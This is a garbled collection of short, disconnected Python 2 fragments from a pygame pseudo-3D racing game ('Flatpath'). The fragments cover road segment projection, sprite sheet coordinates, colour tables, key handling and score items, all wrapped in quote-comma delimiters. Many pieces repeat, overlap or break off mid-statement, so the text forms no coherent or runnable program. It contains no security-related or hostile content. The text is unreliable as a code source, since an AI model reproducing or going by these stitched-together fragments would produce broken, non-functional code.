rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for", "self.speed += self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn", "a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def", "#print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache", "seg_n #print si seg = self.segments[si] #''' ''' #x# if", "self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png',", "curve=0.0, yw=0.0): #print '+', curve, yw n = len(self.segments) #print", "/ 2 - self.player_x - curve_d * i #xc2 =", "= -self.road_w / 2 - self.player_x # <3> #engi =", "i < 10: print '>>> ', i print 'curve', seg.get('curve',", "= pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312", "self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)),", "info['obj'] = obj ##self.disp_add(obj) # NOTE: render out here self.rd_sprt_objs[obj_k]", "self.lane_w xcl4 = xc4 + self.lane_w xcr1 = xcr1 -", "#self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0 self.position", "k == self.pglc.K_LEFT: return 3 else: return None def key_to_di_b(self,", "self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble'])", "= 40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW,", "', i print 'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z']", "c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])", "'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},", "class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file,", "the grass, slow down if self.player_x < -self.road_w / 2", "segs, rad): pnts = self.get_segs_pnts(segs, rad) #print pnts if len(pnts)", "self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n: return", "332 }, 'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328,", "hold + leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),", "- self.player_x #xc3 = self.road_w / 2 - self.player_x #xc4", "self.player_go = 0 if 2 in e_keys_up: if self.player_go !=", "self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0 ==", "pass def rd_sprts_render(self, seg, x_pos, x_i, y, scale): sprts =", "road TODO: * hill road * more road sprites *", "ys3) / 2.0 x_dt = x_rnd * seg_scale x_pos =", "zc): if zc == 0.0: #yp = float('inf') #yp =", "event.type == self.pglc.KEYUP: k = event.key if k == self.pglc.K_SPACE:", "'h': 118 }, 'BUSH2': { 'x': 255, 'y': 1097, 'w':", "- self.position zc2 = zw2 - self.camera_z - self.position #", "def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file,", "'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'],", "return a + (b - a) * ((-math.cos(percent * math.pi)/2)", "sprites cache self.rd_sprt_cache = [] # <1> #for i, seg", "self.last_seg_i = 0 self.score = 0 self.game_over = False self.game_score", "'#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108',", "< -1.0: a = -1.0 elif a > 1.0: a", "rad): a = float(curve) / rad #a *= 10.0 #print", "'y': yw}, 'camera': {}, 'screen': {}}, 'curve': curve, 'color': c,", "# reflect the y- d = 116 pnts = [[x1,", "= self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt", "self.position > self.track_len: self.position -= self.track_len # for check score", "zc1) x_rnd = random.randint(1, self.road_w / 2 - 10) *", "['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs':", "* 2 if hill.rect.left - hill.rect.width > 0: hill.rect.left -=", "if not sprts: return None for i, info in enumerate(sprts):", "= seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 = yc", "after road #self.road = FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640,", "self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0", "#self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5", "'h': 78 }, 'CAR03': { 'x': 1383, 'y': 760, 'w':", "'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble':", "if (car_x - w_half) < sprt_at < (car_x + w_half):", "0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE':", "10) * seg_scale #x_sprt = (xs1 + xs2) / 2.0", "{ 'x': 995, 'y': 5, 'w': 200, 'h': 315 },", "c=[0, 81, 8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c", "**kwargs): return events def refresh(self, fps_clock, *args, **kwargs): pass class", "'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x':", "#'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},", "<1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "sk not in ['obj']: spr_n[sk] = sv else: spr_n[sk] =", "+ (b - a) * math.pow(percent, 2) def util_ease_out(self, a,", "self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4,", "-self.road_w / 2 - self.player_x #xcl1 = xc1 - self.lane_w", "#print 'self.position', self.position # <2> seg_n = len(self.segments) segbi =", "a) * (1 - math.pow(1 - percent, 2)) def util_ease_in_out(self,", "xcl4 = xc4 + self.lane_w xcr1 = xcr1 - x_curve", "self.straight.rect.top = 0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 =", "{'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass':", "d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception", "segs_file is not None: try: segs = self.rd_seg_json_load(segs_file) self.segments =", "self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h)", "delete all # NOTE: only show one break return obj", "if di is not None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event)", "if 1 in e_keys_up: if self.player_di != 3: self.player_di =", "- car_w / 2), sprt_at, (car_x + car_w / 2)", "self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif", "- self.player_x #xc2 = -self.road_w / 2 - self.player_x #xc3", "* 2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed *", "#p_dt = -40 #p_dt = random.randint(-100, 100) #print p_dt for", "(car_x + car_w / 2) #print '-' * 40 w_half", "= { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'],", "tht += tht_d rad_m = 10.0#50.0# x += rad_m *", "xc4 = -self.road_w / 2 - self.player_x yc = self.camera_h", "480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left = 80 self.rdmap.rotate(90)", "- self.player_x - curve_d * i #xc3 = self.road_w /", "= seg_i else: return # NOTE: here we should use", "[], 'looped': 0, } self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len", "UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map * TAB :", "self.xw = 0.0 self.yw = 0.0 self.zw = 0.0 self.xc", "seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #'''", "# x_i_saved = x_i obj.rect.top = 116 - y +", "#print 'rd_seg_init_rand', n for i in range(n): rl = random.choice([1,", "= self.seg_len * math.tan(theta2) xs1 += dx1 xs2 += dx1", "= self.road_w / 2 - self.player_x xc4 = -self.road_w /", "xsl1, ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2, ys2,", "self.position zc2 = zw2 - self.camera_z - self.position #zc1 =", "ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test", "road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf =", "tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for seg", "= self.h / d for i in range(n): rct =", "ys1, xs2, ys2 print xs4, ys4, xs3, ys3 print '-'", "#print yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "#xcl2 = xc2 + self.lane_w #xcl3 = xc3 - self.lane_w", "self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top =", "0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i", "['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs':", "= xc4 - x_curve - dx_curve xcl1 = xc1 -", "{ 'x': 621, 'y': 897, 'w': 298, 'h': 140 },", "'w': 80, 'h': 41 }, 'PLAYER_STRAIGHT': { 'x': 1085, 'y':", "rad) #tht += tht_d tht -= tht_d rad_m = 20.0#10.0#50.0#", "100) self.add_road(enter, hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print", "self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble'])", "pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left = 600 self.disp_add(self.scr)", "'w': 122, 'h': 144 }, 'TRUCK': { 'x': 1365, 'y':", "xcr3 = xcr3 - x_curve - dx_curve xcr4 = xcr4", "return max(mn, min(value, mx)) def util_accelerate(self, v, accel, dt): return", "1018, 'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383,", "self.player_x #xc4 = -self.road_w / 2 - self.player_x # <3>", "xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) #", "2 if 1 in e_keys_dn: self.player_di = 1 elif 3", "d for i in range(n): rct = [0, i *", "= 0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])", "'=' * 80 print 'self.position', self.position # <2> seg_n =", "ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2: draw a circle\"\"\"", "0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg = None", "* 80 #print 'self.position', self.position # <2> seg_n = len(self.segments)", "zc2 = zw2 - self.camera_z - self.position # for curve", "self.speed < 0.0: self.speed = 0.0 elif self.speed > self.speed_max:", "cloud for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed if sky.rect.left", "/ 2): if (car_x - w_half) < sprt_at < (car_x", "x_i obj.rect.top = 116 - y + 240 - obj.rect.height", "{'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb':", "order self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200#", "= seg_n / 20 n = seg_n / random.randint(10, 30)", "315 }, 'BILLBOARD01': { 'x': 625, 'y': 375, 'w': 300,", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "zc2) xsl3 = self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4, self.d, zc2)", "(rad - xx2) - self.player_x xc3 = (rad - xx3)", "'y': 1262, 'w': 230, 'h': 220 }, 'BILLBOARD02': { 'x':", "'h': 315 }, 'BILLBOARD01': { 'x': 625, 'y': 375, 'w':", "self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top", "{ 'x': 1383, 'y': 961, 'w': 80, 'h': 45 },", "41 } } FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW", "'y': 825, 'w': 80, 'h': 59 }, 'CAR04': { 'x':", "key_to_di(self, k): if k == self.pglc.K_UP: return 0 elif k", "-= self.player_x_dt self.player_x -= self.speed / 5 + 20 else:", "def util_ease_in_out(self, a, b, percent): return a + (b -", "self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw", "rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for seg in segs: curve", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height): num =", "if whole: segs = self.segments else: segs = self.segments[:-self.seg_draw_n] return", "def __init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg =", "xc1 - self.lane_w xcl2 = xc2 + self.lane_w xcl3 =", "xs1, ys1, xs2, ys2 print xs4, ys4, xs3, ys3 print", "== self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif k", "= seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt,", "385, 'h': 265 }, 'TREE1': { 'x': 625, 'y': 5,", "seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1", "self.c_prog, [1, self.size[1] - y, self.size[0] - 2, y]) class", "self.position zc2 = zw2 - self.camera_z - self.position ''' #", "xs1 = self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1) xs2", "self.road_w / 2 - self.player_x #xc2 = -self.road_w / 2", "and not keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file", "/ ... 'obj': None, # need to create at render", "<2> seg_n = len(self.segments) segbi = self.get_seg_base_i() #print 'segbi', segbi,", "return #rd_w_half = self.road_w / 2 #x_pos = [rd_w_half +", "1) * self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {}, 'screen': {}}, 'p2':", "'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'],", "0 elif k == self.pglc.K_RIGHT: return 1 elif k ==", "in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left +", "create_by_img(cls, img): return cls(img) # for test #o = SptTmpx((40,", "= random.randint(10, 40) hold = random.randint(10, 40) leave = random.randint(10,", "+ xs2) / 2.0 #y_sprt = (ys1 + ys3) /", "375, 'w': 300, 'h': 170 }, 'BILLBOARD06': { 'x': 488,", "2, y]) # from down to up self.pygm.draw.rect(self.surf, self.c_prog, [1,", "**kwargs): #print '>>> ', events if not self.flag_check_event: return events", "0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print", "Exception as e: print e self.init_rd_segs_rand_1() else: if not keep_segs:", "0.0 rad_m = 4.0#2.0#1.0# pnts.append([x, y]) for seg in segs:", "self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d,", "298, 'h': 190 }, 'BILLBOARD07': { 'x': 313, 'y': 897,", "print '>>> ', i print 'curve', seg.get('curve', 0.0) print 'world", "#''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,", "xc4 - x_curve - dx_curve xcl1 = xc1 - self.lane_w", "**kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240", "None for i, info in enumerate(sprts): sprt = info['name'] obj_k", "= [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1,", "self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH:", "c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg = c_bg self.c_prog = c_prog self.progress(0.0)", "== self.pglc.K_SPACE: # hide / show road map self.rdmap_hide() elif", "IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car =", "= None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f): sc", "= pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600", "\"\"\" Flatpath, go forward forever. http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: *", "- a) * math.pow(percent, 2) def util_ease_out(self, a, b, percent):", "10.0 else: curve = rl * random.random() * 6.0 yw", "= FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left = 0 self.disp_add(self.straight) ''''", "'type': 1, # image / animate / ... 'obj': None,", "< sprt_at < (car_x + w_half): self.score += scr def", "0.0 self.yc = 0.0 self.zc = 0.0 ## self.xp =", "pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left = -230", "else: segs = self.segments[:-self.seg_draw_n] return segs # #### geometry ####", "seg_n = len(self.segments) i = (i + seg_n) % seg_n", "'x': 1085, 'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_RIGHT':", "xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\"", "* 8.0 yw = 0.0 self.add_road(enter, hold, leave, curve, yw)", "/ self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len)) #i = int(math.floor(pos", "i, info in enumerate(sprts): sprt = info['name'] obj_k = str(seg['index'])", "x_i_saved = x_i obj.rect.top = 116 - y + 240", "self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs):", "c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd", "1280, 'h': 480 }, } IMG_POS_SPRITES = { 'PALM_TREE': {", "995, 'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_STRAIGHT': {", "self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4,", "self.track_len = len(self.segments) * self.seg_len except Exception as e: print", "= FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def", "result def util_ease_in(self, a, b, percent): return a + (b", "= num or ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW'] self.add_road(num,", "= 4.0#2.0#1.0# pnts.append([x, y]) for seg in segs: curve =", "'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},", "0, ys3, seg['color']['grass']) # road self.render_polygon(None, xs1, ys1, xs2, ys2,", "utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top =", "{ 'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215, 'h':", "dx2 #+ dx1 xs4 += dx2 #+ dx1 ''' self.render_polygon(None,", "= { 'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215,", "utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn", "-= 10 if self.speed < 0.0: self.speed = 0.0 elif", "self.rd_sprt_cache = [] # for sprites render order self.track_len =", "/ 2) #print '-' * 40 w_half = car_w /", "* xp xs = w / 2.0 + xp return", "ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self):", "len(self.segments) i = (i + seg_n) % seg_n return i", "= True self.game_score = 1.0 if self.player_di == 1: #self.player_x", "\"\"\"curve test 1\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "-40 #p_dt = random.randint(-100, 100) #print p_dt for sky in", "2) #print '-' * 40 w_half = car_w / 2", "*args, **kwargs): #print '>>> refresh' #''' if self.player_di == 3:", "import sptdraw from starfish import utils IMG_POS_BACKGROUND = { 'HILLS':", "self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2,", "(i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1> zw1 = seg['p1']['world']['z']", "= 2 y_sprt = ys1 scale_sprt = seg_scale * 8.0#10.0#2.0", "ys3, seg['color']['road']) if 1:#i % 2 == 1: xpl1 =", "as fi: s = fi.read() segs = utils.json_loads(s) return segs", "class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap,", "= 0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0", "self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 #'''", "else: rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l += curve", "0) self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num, 0,", "- self.camera_z - (self.position % self.seg_len) zc2 = zw2 -", "100, 'h': 78 }, 'CAR03': { 'x': 1383, 'y': 760,", "+= 10.0#5.0#1.0 self.position += random.randint(2, 10) if self.position > self.track_len:", "events): #print id(events) r_events = [] e_keys_up = [] e_keys_dn", "self.seg_len * math.tan(theta1) dx2 = self.seg_len * math.tan(theta2) xs1 +=", "y- d = 116 pnts = [[x1, d-y1], [x2, d-y2],", "self.speed_max: self.speed = self.speed_max self.position += self.speed if self.position >", "0) # render road sprites # TODO: check if this", "open(f, 'w') as fo: fo.write(s) def rd_seg_json_load(self, f): with open(f,", "self.player_x xcr4 = -self.lane_w - self.player_x yc = self.camera_h #print", "**kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0", "(segbi + i) % seg_n #print si seg = self.segments[si]", "add_low_rolling_hills(self, num, height): num = num or ROAD['LENGTH']['SHORT'] height =", "500 #x#xc1 = self.road_w / 2 - self.player_x - curve_d", "'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK,", "rd_seg_json_load(self, f): with open(f, 'r') as fi: s = fi.read()", "progress(self, prog): y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN,", "self.camera_z - self.position #zc1 = self.position - (zw1 - self.camera_z)", "760, 'w': 88, 'h': 55 }, 'CAR02': { 'x': 1383,", "-1]) if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl *", "2 + sprt_w / 2 #if (car_x + car_w /", "<2> for i in range(self.seg_draw_n): #''' # <2> si =", "2) * self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}}, 'curve':", "tht_d tht -= tht_d rad_m = 20.0#10.0#50.0# cv_s = 0", "= utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w", "0: #if n % 4 == 0: c = FP_COLORS['LIGHT']", "xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4", "##self.disp_add(obj) # NOTE: render out here self.rd_sprt_objs[obj_k] = obj #", "#c = {'road': FP_COLOR_BLACK} seg = { 'index': n, 'p1':", "engi = math.pi / 2.0 / 60#10#20 rad = self.road_w", "= xcr2 - x_curve xcr3 = xcr3 - x_curve -", "in ['obj']: spr_n[sk] = sv else: spr_n[sk] = None seg_c[k].append(spr_n)", "* 30 ''' ''' #x# if seg['index'] < segbi: zw1", "self.disp_del(obj) # NOTE: objs will be deleted at rd_sprts_del_all_objs() ##del", "self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top =", "'y': self.seg_lasy_y()}, 'camera': {}, 'screen': {}}, 'p2': {'world': {'z': (n", "# num segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4,", "{'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell':", "- dx_curve x_curve = x_curve + dx_curve dx_curve = dx_curve", "< (car_x + car_w / 2): if (car_x - w_half)", "if self.score > 0: self.score -= 1 #self.score -= 1", "seg.get('curve', 0.0) if curve == 0.0: rad_m = 1.0#0.1# else:", "600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340", "pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts] c", "rd_seg_get_cleared(self, segs=None): if not segs: segs = self.segments segs_c =", "'MEDIUM': 40, 'HIGH': 60 }, } FP_ROAD_SPRTS = { 'chest':", "FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "= FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' # <2> if", "1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': { 'x': 1385,", "# curve = 0.0 # yw = random.random() * 10.0", "info['name'] obj_k = str(seg['index']) + '_' + str(i) + '_'", "def util_increase(self, start, increment, mx): # with looping result =", "'=' * 80 #print 'self.position', self.position # <2> seg_n =", "'x': 995, 'y': 5, 'w': 200, 'h': 315 }, 'BILLBOARD01':", "not init and not keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs)", "+ xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i = random.randint(0,", "= self.xc_to_xp(xcr2, self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 =", "#self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) # for a3c train", "- math.pow(1 - percent, 2)) def util_ease_in_out(self, a, b, percent):", "+ 1)) xc1 = (rad - xx1) - self.player_x xc2", "'x': 230, 'y': 280, 'w': 320, 'h': 220 }, 'COLUMN':", "self.rd_sprt_objs[k] def util_limit(self, value, mn, mx): return max(mn, min(value, mx))", "self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top =", "x_curve - dx_curve xc4 = xc4 - x_curve - dx_curve", "#x_pos = [rd_w_half + self.lane_w, # rd_w_half - self.lane_w] sprt_x", "2 - self.player_x #xc4 = 